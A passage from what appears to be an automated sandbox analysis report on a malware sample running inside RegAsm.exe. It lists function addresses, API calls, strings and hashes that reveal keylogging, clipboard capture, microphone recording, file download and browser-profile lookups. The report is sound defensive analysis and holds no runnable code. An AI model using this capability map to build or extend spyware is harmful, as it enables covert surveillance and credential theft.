                                                          • GetSystemMetrics.USER32(0000004C), ref: 004193F0
                                                          • GetSystemMetrics.USER32(0000004D), ref: 004193F6
                                                          • GetSystemMetrics.USER32(0000004E), ref: 004193FC
                                                          • GetSystemMetrics.USER32(0000004F), ref: 00419402
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: MetricsSystem
                                                          • String ID:
                                                          • API String ID: 4116985748-0
                                                          • Opcode ID: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                                                          • Instruction ID: 9a44d86f369c7068fc2c949f9b02ed5542bf43da40f6b7222f807aea32733f55
                                                          • Opcode Fuzzy Hash: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                                                          • Instruction Fuzzy Hash: DFF0A471B043155BD744EA759C51A6F6BD5EBD4264F10043FF20887281EE78DC468785
                                                          Function 00438F31 Relevance: 6.0, APIs: 4, Instructions: 14COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00438F31
                                                          • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00438F36
                                                          • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00438F3B
                                                            • Part of subcall function 0043A43A: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0043A44B
                                                          • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00438F50
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                                          • String ID:
                                                          • API String ID: 1761009282-0
                                                          • Opcode ID: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                                          • Instruction ID: 04dbcd9d80b8837b95b31ffc0e846904d80335f120ca5f78e3accc67d081205e
                                                          • Opcode Fuzzy Hash: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                                          • Instruction Fuzzy Hash: 59C04C15080781541C50B6B2210B2AE83461E7E38DFD074DFFCE0571038E4E043B653F
                                                          Function 00442C5D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __startOneArgErrorHandling.LIBCMT ref: 00442CED
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorHandling__start
                                                          • String ID: pow
                                                          • API String ID: 3213639722-2276729525
                                                          • Opcode ID: ae0341c24035669086af68b363e9d44c4063f2ceb2f02d621ae22780893f867c
                                                          • Instruction ID: c2a334fe3ab53b67a82bc2a1da04863f7f1ed5e2a579c87dfbcc8ae8a095d349
                                                          • Opcode Fuzzy Hash: ae0341c24035669086af68b363e9d44c4063f2ceb2f02d621ae22780893f867c
                                                          • Instruction Fuzzy Hash: C6516DA1E0420296FB167B14CE4137B2BA4DB40751F704D7FF096823AAEB7D8C859A4F
                                                          Function 100063F0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 168COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • _free.LIBCMT ref: 1000655C
                                                            • Part of subcall function 100062BC: IsProcessorFeaturePresent.KERNEL32(00000017,100062AB,00000000,?,?,?,?,00000016,?,?,100062B8,00000000,00000000,00000000,00000000,00000000), ref: 100062BE
                                                            • Part of subcall function 100062BC: GetCurrentProcess.KERNEL32(C0000417), ref: 100062E0
                                                            • Part of subcall function 100062BC: TerminateProcess.KERNEL32(00000000), ref: 100062E7
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3272380901.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000004.00000002.3272320840.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3272380901.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_10000000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                          • String ID: *?$.
                                                          • API String ID: 2667617558-3972193922
                                                          • Opcode ID: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                                          • Instruction ID: 55016225c6cf3c2ad74d5bf99958d96f24b8fe448c0df4d83e2be8db5664878a
                                                          • Opcode Fuzzy Hash: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                                          • Instruction Fuzzy Hash: 2D519475E0060A9FEB14CFA8CC81AADB7F6FF4C394F258169E854E7349D635AE018B50
                                                          Function 00418A92 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 92COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SHCreateMemStream.SHLWAPI(00000000,00000000,?,?,?,00000000), ref: 00418ABE
                                                            • Part of subcall function 00418656: GdipLoadImageFromStream.GDIPLUS(?,?,?,00418AD1,00000000,?,?,?,?,00000000), ref: 0041866A
                                                          • SHCreateMemStream.SHLWAPI(00000000), ref: 00418B0B
                                                            • Part of subcall function 004186CB: GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00418B27,00000000,?,?), ref: 004186DD
                                                            • Part of subcall function 00418679: GdipDisposeImage.GDIPLUS(?,00418B82), ref: 00418682
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Stream$GdipImage$Create$DisposeFromLoadSave
                                                          • String ID: image/jpeg
                                                          • API String ID: 1291196975-3785015651
                                                          • Opcode ID: 6e04f8ac358d86261f340c02fc4254ea4fa5b72d51dab4b51890127c9f8658cf
                                                          • Instruction ID: 71c7567624fb1f0fb67e5b365d5baafb3eed0516d04e2b9615b8e3d4f66a2876
                                                          • Opcode Fuzzy Hash: 6e04f8ac358d86261f340c02fc4254ea4fa5b72d51dab4b51890127c9f8658cf
                                                          • Instruction Fuzzy Hash: 13317F71504300AFC301EF65CC84DAFB7E9FF8A704F00496EF985A7251DB7999448BA6
                                                          Function 0040B748 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                                                          • __Init_thread_footer.LIBCMT ref: 0040B797
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Init_thread_footer__onexit
                                                          • String ID: [End of clipboard]$[Text copied to clipboard]
                                                          • API String ID: 1881088180-3686566968
                                                          • Opcode ID: b75b6418a390f749317f2ab44173591ff602460dbf5675c7faf818e64fc176e3
                                                          • Instruction ID: c7bebb0a0a15900a9cc4ffb6e17528162536323bfdf0e6139bd55c50ddf57f74
                                                          • Opcode Fuzzy Hash: b75b6418a390f749317f2ab44173591ff602460dbf5675c7faf818e64fc176e3
                                                          • Instruction Fuzzy Hash: C0219F32A101054ACB14FB66D8829EDB379AF90318F10453FE505731E2EF386D4A8A9C
                                                          Function 00451B37 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00451D92,?,00000050,?,?,?,?,?), ref: 00451C12
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: ACP$OCP
                                                          • API String ID: 0-711371036
                                                          • Opcode ID: 9e0df5bdb224d2be14a0cd5949da06f0ee57b11af7c7271d7bdd2cdd18eeb32c
                                                          • Instruction ID: fc24b39bc158c677debbea649066bee6e1bba6d32f28379ebc1c8ba741b2d3ba
                                                          • Opcode Fuzzy Hash: 9e0df5bdb224d2be14a0cd5949da06f0ee57b11af7c7271d7bdd2cdd18eeb32c
                                                          • Instruction Fuzzy Hash: BA217D22A4010063DB34CF54C940B9B326ADF50B27F568166ED09C7322F73AED44C39C
                                                          Function 00418B8F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 75COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SHCreateMemStream.SHLWAPI(00000000,00000000,?,?,?,00000000), ref: 00418BAA
                                                            • Part of subcall function 00418656: GdipLoadImageFromStream.GDIPLUS(?,?,?,00418AD1,00000000,?,?,?,?,00000000), ref: 0041866A
                                                          • SHCreateMemStream.SHLWAPI(00000000,00000000,00000000,?,?,?,?,00000000), ref: 00418BCF
                                                            • Part of subcall function 004186CB: GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00418B27,00000000,?,?), ref: 004186DD
                                                            • Part of subcall function 00418679: GdipDisposeImage.GDIPLUS(?,00418B82), ref: 00418682
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Stream$GdipImage$Create$DisposeFromLoadSave
                                                          • String ID: image/png
                                                          • API String ID: 1291196975-2966254431
                                                          • Opcode ID: a27ec27d9e18f0a906ecaac1dc19e5732830617660cf953b76ad9b2867ca9ec8
                                                          • Instruction ID: c6f894421d6f6d4ca6915e56eba1d7ff3797fde04a376feef2065c2e579c4a83
                                                          • Opcode Fuzzy Hash: a27ec27d9e18f0a906ecaac1dc19e5732830617660cf953b76ad9b2867ca9ec8
                                                          • Instruction Fuzzy Hash: 30219371204211AFC705EB61CC88CBFBBADEFCA754F10092EF54693161DB399945CBA6
                                                          Function 00404FF4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67timeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415CC9,?,00000001,0000004C,00000000), ref: 00405030
                                                            • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                                          • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415CC9,?,00000001,0000004C,00000000), ref: 00405087
                                                          Strings
                                                          • KeepAlive | Enabled | Timeout: , xrefs: 0040501F
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: LocalTime
                                                          • String ID: KeepAlive | Enabled | Timeout:
                                                          • API String ID: 481472006-1507639952
                                                          • Opcode ID: 5b49fe7ebc3dd67cdf94e38743eb20928709a3ec39b389cca4b516c591649347
                                                          • Instruction ID: 59903f388a44bacb81d563bcbf5ab321eb0051b597eccb46fab67989b44e7fd4
                                                          • Opcode Fuzzy Hash: 5b49fe7ebc3dd67cdf94e38743eb20928709a3ec39b389cca4b516c591649347
                                                          • Instruction Fuzzy Hash: 1D21F2719046405BD710B7259C0676F7B64E751308F40087EE8491B2A6DA7D5A88CBEF
                                                          Function 0041663B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62sleepfilenetworkCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • Sleep.KERNEL32 ref: 00416640
                                                          • URLDownloadToFileW.URLMON(00000000,00000000,00000002,00000000,00000000), ref: 004166A2
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: DownloadFileSleep
                                                          • String ID: !D@
                                                          • API String ID: 1931167962-604454484
                                                          • Opcode ID: 5095b75c5f9db238aea0001e6592924ae8405ba6706ac8883079950a7719889b
                                                          • Instruction ID: f21b004d79e7af0ef9ad63e4b6518ad07bb10e0138b316cec4f8e9f86784bb19
                                                          • Opcode Fuzzy Hash: 5095b75c5f9db238aea0001e6592924ae8405ba6706ac8883079950a7719889b
                                                          • Instruction Fuzzy Hash: C6115171A083029AC714FF72D8969BE77A8AF54348F400C3FF546621E2EE3C9949C65A
                                                          Function 100016AA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 61COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3272380901.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000004.00000002.3272320840.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3272380901.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_10000000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: _strlen
                                                          • String ID: : $Se.
                                                          • API String ID: 4218353326-4089948878
                                                          • Opcode ID: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                          • Instruction ID: 66f447a9efa091531784e06c0e565222335d100d85517175c1dac28435e0d9bb
                                                          • Opcode Fuzzy Hash: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                          • Instruction Fuzzy Hash: 2F11E7B5904249AEDB11DFA8D841BDEFBFCEF09244F104056E545E7252E6706B02C765
                                                          Function 0041B4EF Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59timeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: LocalTime
                                                          • String ID: | $%02i:%02i:%02i:%03i
                                                          • API String ID: 481472006-2430845779
                                                          • Opcode ID: 9943bc0e607642414e1270e8ed0348d03c595322458554df1a59568979ca2f05
                                                          • Instruction ID: b0c371a91d376d28eb23a1cf2c2b6b2589463c7c7bf84255da33bc44f247512a
                                                          • Opcode Fuzzy Hash: 9943bc0e607642414e1270e8ed0348d03c595322458554df1a59568979ca2f05
                                                          • Instruction Fuzzy Hash: 361181714082055AC304EB62D8419BFB3E9AB44348F50093FF895A21E1EF3CDA49C65A
                                                          Function 0041AD17 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • PathFileExistsW.SHLWAPI(00000000), ref: 0041AD3C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ExistsFilePath
                                                          • String ID: alarm.wav$hYG
                                                          • API String ID: 1174141254-2782910960
                                                          • Opcode ID: 927e0edff403eebb4f9eff2a49ef343572b544c1c63ef3d24774cae310748075
                                                          • Instruction ID: 1ebdaa4a32a078914063a8122a991a3a49773bb3edac1861de613ef54c78e1f6
                                                          • Opcode Fuzzy Hash: 927e0edff403eebb4f9eff2a49ef343572b544c1c63ef3d24774cae310748075
                                                          • Instruction Fuzzy Hash: 7A01F5B064460156C604F37698167EE37464B80319F00447FF68A266E2EFBC9D99C68F
                                                          Function 0040B051 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B172
                                                            • Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3
                                                            • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                                          • CloseHandle.KERNEL32(?), ref: 0040B0B4
                                                          • UnhookWindowsHookEx.USER32 ref: 0040B0C7
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                                          • String ID: Online Keylogger Stopped
                                                          • API String ID: 1623830855-1496645233
                                                          • Opcode ID: 086a3c4929947be54678252dfea77875741b8c789e716d5a77e1f3bca4bdded6
                                                          • Instruction ID: 2e372e3e3892c4e8816e9c8053feed756abc81e7e35a03d4dadb391bbfa0e77d
                                                          • Opcode Fuzzy Hash: 086a3c4929947be54678252dfea77875741b8c789e716d5a77e1f3bca4bdded6
                                                          • Instruction Fuzzy Hash: 0101F5306002049BD7217B35C80B3BF7BA59B41305F40007FE642226D2EBB91845D7DE
                                                          Function 10001EDE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 10002903
                                                            • Part of subcall function 100035D2: RaiseException.KERNEL32(?,?,?,10002925,00000000,00000000,00000000,?,?,?,?,?,10002925,?,100121B8), ref: 10003632
                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 10002920
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3272380901.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000004.00000002.3272320840.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3272380901.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_10000000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: Exception@8Throw$ExceptionRaise
                                                          • String ID: Unknown exception
                                                          • API String ID: 3476068407-410509341
                                                          • Opcode ID: 00f05d2547b3034e4c7bbe2eae49a616f435d37e9c126e5e725cfb9fdfb6d2bb
                                                          • Instruction ID: 696891806b75a506f07e96a947ab79166ff1ea0d2f17bc9dac180a151cc952bd
                                                          • Opcode Fuzzy Hash: 00f05d2547b3034e4c7bbe2eae49a616f435d37e9c126e5e725cfb9fdfb6d2bb
                                                          • Instruction Fuzzy Hash: 2BF0A47890420D77AB04E6E5EC4599D77ACDB006D0F508161FD1496499EF31FA658690
                                                          Function 004017EC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • waveInPrepareHeader.WINMM(00F616E0,00000020,?,?,00476B50,00474EE0,?,00000000,00401A15), ref: 00401849
                                                          • waveInAddBuffer.WINMM(00F616E0,00000020,?,00000000,00401A15), ref: 0040185F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: wave$BufferHeaderPrepare
                                                          • String ID: XMG
                                                          • API String ID: 2315374483-813777761
                                                          • Opcode ID: 84db4ebe13300bab6e2e85a4a45c37fcad2fa82ad9d185d6556c2711ca00a3b1
                                                          • Instruction ID: 6f1d19605e244f5f119b09d66236675289974365e05be472c2159163c6862827
                                                          • Opcode Fuzzy Hash: 84db4ebe13300bab6e2e85a4a45c37fcad2fa82ad9d185d6556c2711ca00a3b1
                                                          • Instruction Fuzzy Hash: D3016D71700301AFD7209F75EC48969BBA9FB89355701413AF409D3762EB759C90CBA8
                                                          Function 00448AE6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • IsValidLocale.KERNEL32(00000000,JD,00000000,00000001,?,?,00444AEA,?,?,004444CA,?,00000004), ref: 00448B32
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: LocaleValid
                                                          • String ID: IsValidLocaleName$JD
                                                          • API String ID: 1901932003-2234456777
                                                          • Opcode ID: 98bf4732c76f9d0cbfb8c103c3b900cf5be1bffc9926f7dc5154a94851103fac
                                                          • Instruction ID: c43517d2c5aad0833927174c53c021eab8a1ac695cd7bc198788f3b2bcf9e263
                                                          • Opcode Fuzzy Hash: 98bf4732c76f9d0cbfb8c103c3b900cf5be1bffc9926f7dc5154a94851103fac
                                                          • Instruction Fuzzy Hash: D6F05230A80308F7DB106B60DC06FAEBF58CB04B52F10017EFD046B291CE786E05929E
                                                          Function 0040C4C3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 0040C4F6
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ExistsFilePath
                                                          • String ID: UserProfile$\AppData\Local\Google\Chrome\
                                                          • API String ID: 1174141254-4188645398
                                                          • Opcode ID: d11da1c58d5dd2ef9da09c3ea68de0927d50847f2cce6e72d2cc7c3e9ccd8b86
                                                          • Instruction ID: 529cceb54bdbac8586af3e6ebd5273a77adcdcd577382419881006e182ae29c8
                                                          • Opcode Fuzzy Hash: d11da1c58d5dd2ef9da09c3ea68de0927d50847f2cce6e72d2cc7c3e9ccd8b86
                                                          • Instruction Fuzzy Hash: 96F05E31A00219A6C604BBF69C478BF7B3C9D50709B50017FBA01B61D3EE789945C6EE
                                                          Function 0040C526 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 0040C559
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ExistsFilePath
                                                          • String ID: UserProfile$\AppData\Local\Microsoft\Edge\
                                                          • API String ID: 1174141254-2800177040
                                                          • Opcode ID: 62d77e7710f88fd67431bbf20b3e0d601dfd53fd2a54c8c31c6ded84776c1d6f
                                                          • Instruction ID: 330371ab8f71d6844e3501a7b0875f3b866c8fe31c1dcac5d822fe972055fe7f
                                                          • Opcode Fuzzy Hash: 62d77e7710f88fd67431bbf20b3e0d601dfd53fd2a54c8c31c6ded84776c1d6f
                                                          • Instruction Fuzzy Hash: ECF05E31A00219A6CA14B7B69C47CEF7B6C9D50705B10017FB602B61D2EE78994186EE
                                                          Function 0040C589 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • PathFileExistsW.SHLWAPI(00000000,\Opera Software\Opera Stable\,00000000), ref: 0040C5BC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ExistsFilePath
